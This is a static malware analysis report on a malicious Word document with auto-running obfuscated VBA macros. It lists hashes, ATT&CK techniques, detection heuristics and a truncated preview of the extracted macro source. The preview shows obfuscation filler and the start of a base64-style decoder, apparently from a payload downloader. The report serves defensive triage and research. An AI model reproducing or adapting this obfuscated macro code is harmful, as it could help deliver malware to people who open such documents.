Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 64de5c83da91a770…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 123.5 KB
Created: 2018-04-20 03:13:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 5a4ea7e64823ba47e5e520a866f7bd67
SHA-1: cdee595fb6820d155d15516261474d7b805d356e
SHA-256: 64de5c83da91a7709d09d0d273cbfe1277d0c7d45dd556223e486c34748f5796
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, flagged by multiple heuristics, runs automatically when the document is opened. The presence of a CreateObject call together with the detected obfuscation suggests the macro is intended to download and execute a second-stage payload, a common malware-delivery technique.

Heuristics (9)

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/ [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/ [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 86555 bytes
SHA-256: 6fc883737334c65d0e08214177c98f2e995aae8e2dc548df9999d86ca3846a05
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 2 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BOrcFm"
Public Function jaV8Da7ShLvlFnqN(FDn1sCwz0dsCiQg As String, Optional qSzB3RbZEVvIRBW As Boolean = True) As String
Static mNi7QFlw6oojf7(0 To 255) As Byte
Dim RB9Rgc9blpqUE2 As Object
Dim sUMHumjboQav6y As Object
Dim jlJwnLV7lAU9() As Byte, uevdYX8JPV7uWYP() As Byte
Dim WbKa1MQDwJwVWK As String
Dim hirgQN45CHb As String
hirgQN45CHb = gIcA5pENbd6
WbKa1MQDwJwVWK = eOwPR0rk6mS
If (StrComp(WbKa1MQDwJwVWK, hirgQN45CHb, vbTextCompare) <> 0) Then
MsgBox ("Optional: dA4XqVbMfZC8OE.")
End If
Dim lRxVaB2mDG9tRcWgRF As Long, ERDZBL0lnmniHjs5 As Long
Dim aHQ61K3fW7Se7V As Object
If mNi7QFlw6oojf7(0) = 0 Then
Dim XY6j6HFZW5YDhh As Integer
For lRxVaB2mDG9tRcWgRF = 0 To 255
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF) = 255
Dim R19aKZar39f0PH As Integer
For w1zFeHBCa5j = 5 To 57
R19aKZar39f0PH = w1zFeHBCa5j
Next w1zFeHBCa5j
Next lRxVaB2mDG9tRcWgRF
Dim tezxL96XhuiVkM As Object
Dim XwsiFErZmeMnyG As Integer
For YRHmJgIHhFn = 8 To 86
XwsiFErZmeMnyG = YRHmJgIHhFn
Next YRHmJgIHhFn
For lRxVaB2mDG9tRcWgRF = 0 To 25
Dim WQxFMnc3UbwCSy As Integer
For AnwSBFTAI0Z = 4 To 43
WQxFMnc3UbwCSy = AnwSBFTAI0Z
Next AnwSBFTAI0Z
Dim NiLAqlTWdBK8hN As Integer
Dim t2jBCKUSEBb As String
NiLAqlTWdBK8hN = 9959
Dim tfYY9D8sBJv As Integer
t2jBCKUSEBb = Right(CStr(NiLAqlTWdBK8hN), 1)
tfYY9D8sBJv = CInt(t2jBCKUSEBb)
For LJbSyKzbyNW = tfYY9D8sBJv To 51
NiLAqlTWdBK8hN = NiLAqlTWdBK8hN + 3
Next LJbSyKzbyNW
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 65) = lRxVaB2mDG9tRcWgRF
Next lRxVaB2mDG9tRcWgRF
Dim aIYfkldwFGeSta, mJ4XcjCHcrr As String
aIYfkldwFGeSta = 2
mJ4XcjCHcrr = 1
#If aIYfkldwFGeSta > mJ4XcjCHcrr Then
Dim HsQY7spWOug As LongPtr
#Else
Dim HsQY7spWOug As Integer
HsQY7spWOug = 2 + 1
Dim XC5vYX0KNFX As Integer
For XC5vYX0KNFX = 0 To aIYfkldwFGeSta
XC5vYX0KNFX = XC5vYX0KNFX + 1
Next XC5vYX0KNFX
#End If
For lRxVaB2mDG9tRcWgRF = 26 To 51
Dim svOe2L9swYJ3gy As Object
Dim CM3i1FszViQRYZ, CCD3WjKQvw9 As Integer
CM3i1FszViQRYZ = 5
CCD3WjKQvw9 = 4
#If TYNcz7VYrOo <> 0 Then
TYNcz7VYrOo = TYNcz7VYrOo + 6
Dim brkdVALpmRu As Variant
Else
Dim brkdVALpmRu As Object
#End If
If CM3i1FszViQRYZ > CCD3WjKQvw9 Then
For PMWKiI3XwaHier = CCD3WjKQvw9 To CM3i1FszViQRYZ
CCD3WjKQvw9 = CCD3WjKQvw9 / CM3i1FszViQRYZ
Next PMWKiI3XwaHier
End If
Dim kmGAGmZNeUcOZI As String
Dim Fw0pnFrXEHx As String
Fw0pnFrXEHx = syPPpNrV602
kmGAGmZNeUcOZI = eeP5LqZWsJG
If (StrComp(kmGAGmZNeUcOZI, Fw0pnFrXEHx, vbTextCompare) <> 0) Then
MsgBox ("Optional: KMFXecAcUi9LPy.")
End If
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 71) = lRxVaB2mDG9tRcWgRF
Dim DuGbV0kgeMFzgY As String
DuGbV0kgeMFzgY = Application.UserName
Dim ai8v3kDak1R, scroJET6oJPJ7Y As Integer
scroJET6oJPJ7Y = Len(DuGbV0kgeMFzgY)
Dim UcaYHqEPRoe As Collection
While scroJET6oJPJ7Y > 9
ai8v3kDak1R = ai8v3kDak1R + 4
scroJET6oJPJ7Y = scroJET6oJPJ7Y - 9
Wend
Dim QzlzKa48Al4uqX, CXVrlzS97hd As Integer
QzlzKa48Al4uqX = 2
CXVrlzS97hd = 9
#If cVt8VLpQ1oF <> 0 Then
cVt8VLpQ1oF = cVt8VLpQ1oF + 6
Dim fSrPMZ4w3Xu As Variant
Else
Dim fSrPMZ4w3Xu As Object
#End If
If QzlzKa48Al4uqX > CXVrlzS97hd Then
For yqLTDD5KT0DTmE = CXVrlzS97hd To QzlzKa48Al4uqX
CXVrlzS97hd = CXVrlzS97hd / QzlzKa48Al4uqX
Next yqLTDD5KT0DTmE
End If
Next lRxVaB2mDG9tRcWgRF
Dim kNE4Lkexy9M2HT As Integer
Dim TvE4BaGkIvP As String
kNE4Lkexy9M2HT = 3279
Dim Y2MmDBvz1BM As Integer
TvE4BaGkIvP = Right(CStr(kNE4Lkexy9M2HT), 1)
Y2MmDBvz1BM = CInt(TvE4BaGkIvP)
For KIftvZ0ZA6k = Y2MmDBvz1BM To 33
kNE4Lkexy9M2HT = kNE4Lkexy9M2HT + 1
Next KIftvZ0ZA6k
For lRxVaB2mDG9tRcWgRF = 52 To 61
Dim qDkWUhV0o4a5oz As Integer
Dim txuCMmOY0uGy63 As String
Dim RXTiBrRXLh3 As String
RXTiBrRXLh3 = UXyDDvYqw09
txuCMmOY0uGy63 = YQGDnM2vYnk
If (StrComp(txuCMmOY0uGy63, RXTiBrRXLh3, vbTextCompare) <> 0) Then
MsgBox ("Optional:
... (truncated)